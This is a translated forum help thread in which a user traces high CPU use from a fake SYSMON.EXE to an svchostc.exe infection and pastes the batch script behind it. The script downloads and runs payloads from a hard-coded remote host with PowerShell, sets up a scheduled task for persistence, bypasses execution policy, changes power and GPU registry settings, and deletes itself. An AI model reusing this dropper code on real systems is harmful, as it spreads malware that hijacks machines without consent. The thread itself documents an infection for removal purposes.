SYSMON.EXE CPU'nun neredeyse yarısını alıyor. Virüs mü // ÇÖZÜLDÜ

1

Bu, Visual Studio 2017'i yükledikten sonra oldu. Her yeri aradım ve boşuna burada değilim.

Görev Yöneticisi'nin ekran görüntüsü

Ekran Görüntüsü - TEMP'deki SYSMON.EXE'nin yeri

Visual Studio Klasöründe SYSMON.EXE Kökeni

Konumu ziyaret ettiğimde Görev Yöneticisi'nden. TEMP klasörüne götürür ve tüm boyutu yaklaşık 170 MB'dir. Yasal olup olmadığını bilmiyorum.

Bu Microsoft Linkinde yazıyor , okunaklı ama yine de yüklemek için herhangi bir komut satırı kullanmadım. Ve ayrıca, pencerelerin resmi klasörünün içinde değil, daha çok temp içerisinde.

İşlemi sonlandırsanız bile, bir süre sonra otomatik olarak açılır.

Güncelleme: İşlemi sonlandırmak ve geçici dosyaları silmek işe yaramıyor. Tüm Visual Studio Dosyaları bile (20 + GB) kaldırılsa bile sorun devam ediyor. Yardıma ihtiyacım var. Lütfen!

// // ÇÖZÜLDÜ

Birisi aynı sorunla karşı karşıya kalırsa ipliği tutuyorum

  • Görev yöneticisinde svchostc.exe (svchost.exe değil) bulun ve özgün konumdan silin.
  • Ayrıca, kayıt defterini temizleyin ve geçici dosyaları% temp% dizininden silin

Svchostc.exe, aşağıdaki yarasa dosyalarını yürüttü ve virüs dosyalarını temp klasörüne indirdi ve hepsi geçmiş.

Güncelleme: bu bir yarasa dosyasının içindeydi.

ping www.google.com -n 1 -w 1000 if %errorlevel% == 1 ( exit ) if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/7za.exe -OutFile \"%TEMP%\7za.exe\"" ) if not exist "%TEMP%\ppuarchive4.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\"" ) if not exist "%TEMP%\bcmuarchive12.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\"" ) if not exist "%TEMP%\tmg.ps1" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\"" ) if not exist "%TEMP%\opokl.txt" ( PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\"" PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\"" schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F del "%TEMP%\svctask.xml" echo a > "%TEMP%\opokl.txt" ) if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchbot.vbs -OutFile \"%TEMP%\batchbot.vbs\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\"" "%TEMP%\batchinstaller.bat" ) set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1 1D8C5463FF555789B3706E4571DD6C512B427A9F 5F72F3EFCF42EAAC871C919FA5C85C1C11FB7F6A (for %%a in (%list%) do ( powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90 )) powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" ( "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y "%~dp0\packagenew\buildpassive.bat" echo d > "%LOCALAPPDATA%\svc10.17134\d.txt" rmdir /s /q "%~dp0\packagenew" ) ::taskkill /f /im sysmon.exe tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL if "%ERRORLEVEL%"=="0" exit "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y "%~dp0\packagehwloc\start.bat" start /b "" cmd /c del "%~dp0\upd.bat"&exit /b

windows-10  task-manager 
Min Somai
kaynak
Endişeleniyorsanız, işlemi el ile sonlandırın ve geçici klasörünüzü silin.
Ramhound
Lütfen soruyu, yeterli bir cevabı tanımlamak için yeterli detayı olan belirli bir problemle sınırlandırmak için düzenleyin.
Ramhound
@Ramhound, birçok kez yaptı - yine aynı dosyayla klasörü doldurdu.
Min Somai,
Ve temp klasöründeki dosyaların kaynağını bilmek için herhangi bir yolu var mı?
Min Somai
1
Visual Studio'yu yükledikten sonra bu sorun oluşmaya başladı. Yani Visual Studio'yu kaldırırsanız sorun gider mi?
Ramhound
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.